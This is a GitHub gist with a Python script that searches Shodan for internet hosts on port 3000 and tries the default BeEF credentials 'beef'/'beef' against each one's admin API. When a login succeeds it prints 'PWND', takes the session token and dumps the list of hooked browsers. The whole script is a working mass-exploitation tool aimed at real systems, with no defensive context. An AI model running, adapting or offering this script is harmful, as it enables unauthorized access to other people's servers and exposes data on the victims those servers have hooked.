Skip to content

Instantly share code, notes, and snippets.

@tmap
Last active October 1, 2018 08:53
Show Gist options
  • Save tmap/d490ab56a7da716943703356c2ce0e20 to your computer and use it in GitHub Desktop.
Save tmap/d490ab56a7da716943703356c2ce0e20 to your computer and use it in GitHub Desktop.
import shodan
import sys
import requests
API_KEY = "apitoken"
try:
api = shodan.Shodan(API_KEY)
result = api.search('port:3000 product:"Apache httpd" centOS')
for service in result['matches']:
ip = service['ip_str']
try:
r = requests.post('http://'+ip+':3000/api/admin/login', json = {'username':'beef', 'password':'beef'})
if r.status_code==200:
print 'PWND',ip,str(r.status_code)
data=r.json()
token=data['token']
rg = requests.get('http://'+ip+':3000/api/hooks?token='+str(token))
print rg.text
elif r.status_code==401:
print 'Wrong passwd',ip,str(r.status_code)
else:
continue
except:
pass
except Exception as e:
print 'Error: %s' % e
sys.exit(1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment